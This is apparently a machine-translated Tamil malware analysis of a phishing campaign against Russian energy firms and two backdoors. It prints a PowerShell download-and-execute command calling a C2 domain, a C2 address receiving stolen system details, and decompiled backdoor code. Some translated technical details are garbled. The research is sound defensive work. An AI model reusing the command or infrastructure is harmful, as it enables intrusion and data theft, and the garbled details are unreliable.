கணினி பாதுகாப்பு சம்பவங்களை விசாரிப்பதில் எங்களின் அனுபவம், தாக்குதலுக்கு உள்ளான நெட்வொர்க் உள்கட்டமைப்புகளை ஊடுருவ தாக்குபவர்களால் பயன்படுத்தப்படும் பொதுவான சேனல்களில் மின்னஞ்சல் இன்னும் ஒன்றாகும் என்பதைக் காட்டுகிறது. சந்தேகத்திற்கிடமான (அல்லது மிகவும் சந்தேகத்திற்குரிய) கடிதத்துடன் ஒரு கவனக்குறைவான செயல், மேலும் நோய்த்தொற்றுக்கான நுழைவுப் புள்ளியாக மாறுகிறது, அதனால்தான் சைபர் குற்றவாளிகள் சமூக பொறியியல் முறைகளை தீவிரமாகப் பயன்படுத்துகின்றனர், இருப்பினும் பல்வேறு அளவிலான வெற்றிகள்.
இந்த இடுகையில், ரஷ்ய எரிபொருள் மற்றும் எரிசக்தி வளாகத்தில் உள்ள பல நிறுவனங்களை இலக்காகக் கொண்ட ஸ்பேம் பிரச்சாரம் குறித்த எங்கள் சமீபத்திய விசாரணையைப் பற்றி பேச விரும்புகிறோம். அனைத்து தாக்குதல்களும் போலி மின்னஞ்சல்களைப் பயன்படுத்தி அதே சூழ்நிலையைப் பின்பற்றின, மேலும் இந்த மின்னஞ்சல்களின் உரை உள்ளடக்கத்தில் யாரும் அதிக முயற்சி எடுத்ததாகத் தெரியவில்லை.
புலனாய்வு சேவை
இது அனைத்தும் ஏப்ரல் 2020 இன் இறுதியில் தொடங்கியது, டாக்டர் வெப் வைரஸ் ஆய்வாளர்கள் ஸ்பேம் பிரச்சாரத்தைக் கண்டறிந்தனர், அதில் ஹேக்கர்கள் புதுப்பிக்கப்பட்ட தொலைபேசி கோப்பகத்தை ரஷ்ய எரிபொருள் மற்றும் எரிசக்தி வளாகத்தில் உள்ள பல நிறுவனங்களின் ஊழியர்களுக்கு அனுப்பியுள்ளனர். நிச்சயமாக, இது ஒரு எளிய கவலை இல்லை, ஏனெனில் அடைவு உண்மையானது அல்ல, மேலும் .docx ஆவணங்கள் தொலை ஆதாரங்களில் இருந்து இரண்டு படங்களை பதிவிறக்கம் செய்தன.
அவற்றில் ஒன்று செய்தி[.]zannews[.]com சேவையகத்திலிருந்து பயனரின் கணினியில் பதிவிறக்கம் செய்யப்பட்டது. டொமைன் பெயர் கஜகஸ்தானின் ஊழல் எதிர்ப்பு ஊடக மையத்தின் டொமைனைப் போன்றது என்பது குறிப்பிடத்தக்கது - zannews[.]kz. மறுபுறம், பயன்படுத்தப்பட்ட டொமைன் TOPNEWS எனப்படும் மற்றொரு 2015 பிரச்சாரத்தை உடனடியாக நினைவூட்டுகிறது, இது ICEFOG பின்கதவைப் பயன்படுத்தியது மற்றும் அவர்களின் பெயர்களில் "செய்தி" என்ற துணைச்சரத்துடன் ட்ரோஜன் கட்டுப்பாட்டு டொமைன்களைக் கொண்டிருந்தது. மற்றொரு சுவாரஸ்யமான அம்சம் என்னவென்றால், வெவ்வேறு பெறுநர்களுக்கு கடிதங்களை அனுப்பும்போது, ஒரு படத்தைப் பதிவிறக்குவதற்கான கோரிக்கைகள் வெவ்வேறு கோரிக்கை அளவுருக்கள் அல்லது தனித்துவமான படப் பெயர்களைப் பயன்படுத்துகின்றன.
"நம்பகமான" முகவரியாளரை அடையாளம் காண, தகவலைச் சேகரிக்கும் நோக்கத்திற்காக இது செய்யப்பட்டது என்று நாங்கள் நம்புகிறோம், அவர் சரியான நேரத்தில் கடிதத்தைத் திறப்பதற்கு உத்தரவாதம் அளிக்கப்படுவார். SMB நெறிமுறையானது இரண்டாவது சேவையகத்திலிருந்து படத்தைப் பதிவிறக்குவதற்குப் பயன்படுத்தப்பட்டது, இது பெறப்பட்ட ஆவணத்தைத் திறந்த பணியாளர்களின் கணினிகளில் இருந்து NetNTLM ஹாஷ்களை சேகரிக்க முடியும்.
போலி கோப்பகத்துடன் கடிதம் இங்கே உள்ளது:
இந்த ஆண்டு ஜூன் மாதத்தில், ஹேக்கர்கள் படங்களை பதிவேற்ற, விளையாட்டு[.]manhajnews[.]com என்ற புதிய டொமைன் பெயரைப் பயன்படுத்தத் தொடங்கினர். குறைந்தபட்சம் செப்டம்பர் 2019 முதல் ஸ்பேம் அஞ்சல்களில் manhajnews[.]com துணை டொமைன்கள் பயன்படுத்தப்பட்டு வருவதாக பகுப்பாய்வு காட்டுகிறது. இந்த பிரச்சாரத்தின் இலக்குகளில் ஒன்று ஒரு பெரிய ரஷ்ய பல்கலைக்கழகம்.
மேலும், ஜூன் மாதத்திற்குள், தாக்குதலின் அமைப்பாளர்கள் தங்கள் கடிதங்களுக்கு ஒரு புதிய உரையைக் கொண்டு வந்தனர்: இந்த முறை ஆவணத்தில் தொழில் வளர்ச்சி பற்றிய தகவல்கள் இருந்தன. கடிதத்தின் உரை, அதன் ஆசிரியர் ரஷ்ய மொழியைப் பேசுபவர் அல்ல, அல்லது வேண்டுமென்றே தன்னைப் பற்றி அத்தகைய தோற்றத்தை உருவாக்குகிறார் என்பதை தெளிவாகக் குறிக்கிறது. துரதிர்ஷ்டவசமாக, தொழில்துறை மேம்பாட்டிற்கான யோசனைகள், எப்போதும் போல, ஒரு அட்டையாக மாறியது - ஆவணம் மீண்டும் இரண்டு படங்களைப் பதிவிறக்கியது, அதே நேரத்தில் சேவையகம் பதிவிறக்கம்[.]inklingpaper[.]com ஆக மாற்றப்பட்டது.
அடுத்த கண்டுபிடிப்பு ஜூலையில் தொடர்ந்தது. வைரஸ் தடுப்பு நிரல்களால் தீங்கிழைக்கும் ஆவணங்களைக் கண்டறிவதைத் தவிர்க்கும் முயற்சியில், தாக்குபவர்கள் கடவுச்சொல் மூலம் மறைகுறியாக்கப்பட்ட Microsoft Word ஆவணங்களைப் பயன்படுத்தத் தொடங்கினர். அதே நேரத்தில், தாக்குபவர்கள் ஒரு உன்னதமான சமூக பொறியியல் நுட்பத்தைப் பயன்படுத்த முடிவு செய்தனர் - வெகுமதி அறிவிப்பு.
முறையீட்டின் உரை மீண்டும் அதே பாணியில் எழுதப்பட்டது, இது முகவரியாளர் மத்தியில் கூடுதல் சந்தேகத்தை ஏற்படுத்தியது. படத்தைப் பதிவிறக்குவதற்கான சேவையகமும் மாறவில்லை.
எல்லா சந்தர்ப்பங்களிலும், மின்னஞ்சல்[.]ru மற்றும் yandex[.]ru டொமைன்களில் பதிவுசெய்யப்பட்ட மின்னணு அஞ்சல் பெட்டிகள் கடிதங்களை அனுப்பப் பயன்படுத்தப்பட்டன.
தாக்குதல்
செப்டம்பர் 2020 தொடக்கத்தில், இது நடவடிக்கைக்கான நேரம். எங்கள் வைரஸ் ஆய்வாளர்கள் ஒரு புதிய அலை தாக்குதல்களைப் பதிவுசெய்துள்ளனர், அதில் தாக்குபவர்கள் மீண்டும் ஒரு தொலைபேசி கோப்பகத்தைப் புதுப்பிக்கும் போலிக்காரணத்தின் கீழ் கடிதங்களை அனுப்பியுள்ளனர். இருப்பினும், இந்த முறை இணைப்பில் தீங்கிழைக்கும் மேக்ரோ உள்ளது.
இணைக்கப்பட்ட ஆவணத்தைத் திறக்கும்போது, மேக்ரோ இரண்டு கோப்புகளை உருவாக்கியது:
- VBS ஸ்கிரிப்ட் %APPDATA%microsoftwindowsstart menupprogramsstartupadoba.vbs, இது ஒரு தொகுதி கோப்பை தொடங்கும் நோக்கம் கொண்டது;
- தொகுதி கோப்பு %APPDATA%configstest.bat, இது தெளிவற்றது.
அதன் பணியின் சாராம்சம் பவர்ஷெல் ஷெல்லை சில அளவுருக்களுடன் தொடங்குவதாகும். ஷெல்லுக்கு அனுப்பப்பட்ட அளவுருக்கள் கட்டளைகளாக டிகோட் செய்யப்படுகின்றன:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;வழங்கப்பட்ட கட்டளைகளில் இருந்து பின்வருமாறு, பேலோட் பதிவிறக்கம் செய்யப்பட்ட டொமைன் மீண்டும் ஒரு செய்தி தளமாக மாறுவேடமிடப்படுகிறது. ஒரு எளிய , கட்டளை மற்றும் கட்டுப்பாட்டு சேவையகத்திலிருந்து ஷெல்கோடைப் பெற்று அதை இயக்குவதே இதன் ஒரே பணி. பாதிக்கப்பட்டவரின் கணினியில் நிறுவக்கூடிய இரண்டு வகையான பின்கதவுகளை எங்களால் அடையாளம் காண முடிந்தது.
பின் கதவு.Siggen2.3238
முதலாவது பின் கதவு.Siggen2.3238 - எங்கள் வல்லுநர்கள் இதற்கு முன்பு சந்தித்ததில்லை, மேலும் பிற வைரஸ் தடுப்பு விற்பனையாளர்களால் இந்த திட்டத்தைப் பற்றி எதுவும் குறிப்பிடப்படவில்லை.
இந்த நிரல் C++ இல் எழுதப்பட்ட பின்கதவு மற்றும் 32-பிட் விண்டோஸ் இயக்க முறைமைகளில் இயங்குகிறது.
பின் கதவு.Siggen2.3238 இரண்டு நெறிமுறைகளைப் பயன்படுத்தி மேலாண்மை சேவையகத்துடன் தொடர்பு கொள்ள முடியும்: HTTP மற்றும் HTTPS. சோதனை செய்யப்பட்ட மாதிரி HTTPS நெறிமுறையைப் பயன்படுத்துகிறது. சேவையகத்திற்கான கோரிக்கைகளில் பின்வரும் பயனர் முகவர் பயன்படுத்தப்படுகிறது:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
இந்த வழக்கில், அனைத்து கோரிக்கைகளும் பின்வரும் அளவுருக்கள் மூலம் வழங்கப்படுகின்றன:
%s;type=%s;length=%s;realdata=%send
ஒவ்வொரு வரியும் %s அதற்கேற்ப மாற்றப்படும்:
- பாதிக்கப்பட்ட கணினியின் ஐடி,
- அனுப்பப்படும் கோரிக்கை வகை,
- உண்மையான தரவு புலத்தில் உள்ள தரவின் நீளம்,
- தகவல்கள்.
பாதிக்கப்பட்ட அமைப்பைப் பற்றிய தகவல்களைச் சேகரிக்கும் கட்டத்தில், பின்கதவு ஒரு வரியை உருவாக்குகிறது:
lan=%s;cmpname=%s;username=%s;version=%s;
இதில் lan என்பது பாதிக்கப்பட்ட கணினியின் IP முகவரி, cmpname என்பது கணினியின் பெயர், பயனர் பெயர் பயனர் பெயர், பதிப்பு என்பது வரி 0.0.4.03.
sysinfo அடையாளங்காட்டியுடன் கூடிய இந்தத் தகவல், https[:]//31.214[.]157.14/log.txt இல் உள்ள கட்டுப்பாட்டு சேவையகத்திற்கு POST கோரிக்கை மூலம் அனுப்பப்படுகிறது. பதில் என்றால் பின் கதவு.Siggen2.3238 ஹார்ட் சிக்னலைப் பெறுகிறது, இணைப்பு வெற்றிகரமாக கருதப்படுகிறது, மேலும் பின்கதவு சேவையகத்துடன் தொடர்பு கொள்ளும் முக்கிய சுழற்சியைத் தொடங்குகிறது.
இயக்கக் கொள்கைகளின் முழுமையான விளக்கம் பின் கதவு.Siggen2.3238 எங்களில் உள்ளது .
பின்கதவு.வெள்ளைப்பறவை.23
இரண்டாவது திட்டம் BackDoor.Whitebird பின்கதவின் மாற்றமாகும், இது கஜகஸ்தானில் ஒரு அரசாங்க நிறுவனத்துடன் நடந்த சம்பவத்திலிருந்து ஏற்கனவே நமக்குத் தெரியும். இந்த பதிப்பு C++ இல் எழுதப்பட்டுள்ளது மற்றும் 32-பிட் மற்றும் 64-பிட் விண்டோஸ் இயங்குதளங்களில் இயங்கும் வகையில் வடிவமைக்கப்பட்டுள்ளது.
இந்த வகையின் பெரும்பாலான நிரல்களைப் போலவே, பின்கதவு.வெள்ளைப்பறவை.23 கட்டுப்பாட்டு சேவையகத்துடன் மறைகுறியாக்கப்பட்ட இணைப்பை நிறுவவும், பாதிக்கப்பட்ட கணினியின் அங்கீகரிக்கப்படாத கட்டுப்பாட்டை உருவாக்கவும் வடிவமைக்கப்பட்டுள்ளது. ஒரு துளிசொட்டியைப் பயன்படுத்தி சமரசம் செய்யப்பட்ட அமைப்பில் நிறுவப்பட்டது .
நாங்கள் பரிசோதித்த மாதிரி இரண்டு ஏற்றுமதிகளைக் கொண்ட தீங்கிழைக்கும் நூலகம்:
- கூகிள் விளையாட்டு
- டெஸ்ட்.
அதன் வேலையின் தொடக்கத்தில், பைட் 0x99 உடன் XOR செயல்பாட்டின் அடிப்படையில் ஒரு அல்காரிதத்தைப் பயன்படுத்தி பின்கதவு உடலில் கடினப்படுத்தப்பட்ட உள்ளமைவை டிக்ரிப்ட் செய்கிறது. கட்டமைப்பு இதுபோல் தெரிகிறது:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
அதன் நிலையான செயல்பாட்டை உறுதிப்படுத்த, பின்கதவு புலத்தில் குறிப்பிடப்பட்ட மதிப்பை மாற்றுகிறது வேலை_நேரம் கட்டமைப்புகள். புலத்தில் 1440 பைட்டுகள் உள்ளன, அவை 0 அல்லது 1 மதிப்புகளை எடுத்து, நாளின் ஒவ்வொரு மணிநேரத்தின் ஒவ்வொரு நிமிடத்தையும் குறிக்கும். ஒவ்வொரு பிணைய இடைமுகத்திற்கும் தனித்தனி நூலை உருவாக்குகிறது, அது இடைமுகத்தைக் கேட்கிறது மற்றும் பாதிக்கப்பட்ட கணினியிலிருந்து ப்ராக்ஸி சர்வரில் அங்கீகார பாக்கெட்டுகளைத் தேடுகிறது. அத்தகைய பாக்கெட் கண்டறியப்பட்டால், பின்கதவு அதன் பட்டியலில் ப்ராக்ஸி சேவையகத்தைப் பற்றிய தகவலைச் சேர்க்கிறது. கூடுதலாக, WinAPI வழியாக ப்ராக்ஸி இருப்பதை சரிபார்க்கிறது InternetQueryOptionW.
நிரல் தற்போதைய நிமிடம் மற்றும் மணிநேரத்தை சரிபார்த்து, புலத்தில் உள்ள தரவுகளுடன் ஒப்பிடுகிறது வேலை_நேரம் கட்டமைப்புகள். நாளின் தொடர்புடைய நிமிடத்திற்கான மதிப்பு பூஜ்ஜியமாக இல்லாவிட்டால், கட்டுப்பாட்டு சேவையகத்துடன் ஒரு இணைப்பு நிறுவப்பட்டது.
சேவையகத்துடன் ஒரு இணைப்பை நிறுவுதல் கிளையன்ட் மற்றும் சர்வர் இடையே TLS பதிப்பு 1.0 நெறிமுறையைப் பயன்படுத்தி ஒரு இணைப்பை உருவாக்குவதை உருவகப்படுத்துகிறது. பின்கதவின் உடல் இரண்டு இடையகங்களைக் கொண்டுள்ளது.
முதல் இடையகத்தில் TLS 1.0 கிளையண்ட் ஹலோ பாக்கெட் உள்ளது.
இரண்டாவது இடையகத்தில் 1.0x0 பைட்டுகளின் முக்கிய நீளம் கொண்ட TLS 100 கிளையண்ட் கீ எக்ஸ்சேஞ்ச் பாக்கெட்டுகள், சைஃபர் ஸ்பெக் மாற்றம், என்க்ரிப்ட் செய்யப்பட்ட ஹேண்ட்ஷேக் மெசேஜ் ஆகியவை உள்ளன.
கிளையண்ட் ஹலோ பாக்கெட்டை அனுப்பும் போது, பின்கதவு தற்போதைய நேரத்தின் 4 பைட்டுகளையும், கிளையண்ட் ரேண்டம் புலத்தில் 28 பைட்டுகள் போலி-ரேண்டம் தரவையும் பின்வருமாறு கணக்கிடுகிறது:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
பெறப்பட்ட பாக்கெட் கட்டுப்பாட்டு சேவையகத்திற்கு அனுப்பப்படுகிறது. பதில் (சர்வர் ஹலோ பாக்கெட்) சரிபார்க்கிறது:
- TLS நெறிமுறை பதிப்பு 1.0 உடன் இணக்கம்;
- சேவையகத்தால் குறிப்பிடப்பட்ட நேர முத்திரையுடன் கிளையன்ட் குறிப்பிட்ட நேரமுத்திரையின் (ரேண்டம் டேட்டா பாக்கெட் புலத்தின் முதல் 4 பைட்டுகள்) கடிதப் பரிமாற்றம்;
- கிளையன்ட் மற்றும் சர்வரின் ரேண்டம் டேட்டா துறையில் நேரமுத்திரைக்குப் பிறகு முதல் 4 பைட்டுகளின் பொருத்தம்.
குறிப்பிட்ட பொருத்தங்களில், பின்கதவு கிளையண்ட் கீ எக்ஸ்சேஞ்ச் பாக்கெட்டைத் தயாரிக்கிறது. இதைச் செய்ய, இது கிளையண்ட் கீ எக்ஸ்சேஞ்ச் தொகுப்பில் உள்ள பொது விசையையும், மறைகுறியாக்கப்பட்ட ஹேண்ட்ஷேக் செய்தி தொகுப்பில் உள்ள என்க்ரிப்ஷன் IV மற்றும் என்க்ரிப்ஷன் டேட்டாவையும் மாற்றியமைக்கிறது.
பின் கதவு கட்டளை மற்றும் கட்டுப்பாட்டு சேவையகத்திலிருந்து பாக்கெட்டைப் பெறுகிறது, TLS நெறிமுறை பதிப்பு 1.0 என்பதைச் சரிபார்த்து, பின்னர் மற்றொரு 54 பைட்டுகளை (பாக்கெட்டின் உடல்) ஏற்றுக்கொள்கிறது. இது இணைப்பு அமைப்பை நிறைவு செய்கிறது.
இயக்கக் கொள்கைகளின் முழுமையான விளக்கம் பின்கதவு.வெள்ளைப்பறவை.23 எங்களில் உள்ளது .
முடிவு மற்றும் முடிவுகள்
ஆவணங்கள், மால்வேர் மற்றும் பயன்படுத்தப்படும் உள்கட்டமைப்பு ஆகியவற்றின் பகுப்பாய்வு, தாக்குதல் சீன APT குழுக்களால் தயாரிக்கப்பட்டது என்று நம்பிக்கையுடன் கூற அனுமதிக்கிறது. வெற்றிகரமான தாக்குதலின் போது பாதிக்கப்பட்டவர்களின் கணினிகளில் நிறுவப்பட்ட பின்கதவுகளின் செயல்பாட்டைக் கருத்தில் கொண்டு, குறைந்தபட்சம், தாக்கப்பட்ட நிறுவனங்களின் கணினிகளில் இருந்து இரகசியத் தகவல்களைத் திருடுவதற்கு தொற்று வழிவகுக்கிறது.
கூடுதலாக, ஒரு சிறப்பு செயல்பாட்டுடன் உள்ளூர் சேவையகங்களில் சிறப்பு ட்ரோஜான்களை நிறுவுவது மிகவும் சாத்தியமான காட்சியாகும். இவை டொமைன் கன்ட்ரோலர்கள், மெயில் சர்வர்கள், இன்டர்நெட் கேட்வேகள் போன்றவையாக இருக்கலாம். உதாரணத்தில் நாம் பார்க்கலாம் , இத்தகைய சேவையகங்கள் பல்வேறு காரணங்களுக்காக தாக்குபவர்களுக்கு குறிப்பாக ஆர்வமாக உள்ளன.
ஆதாரம்: www.habr.com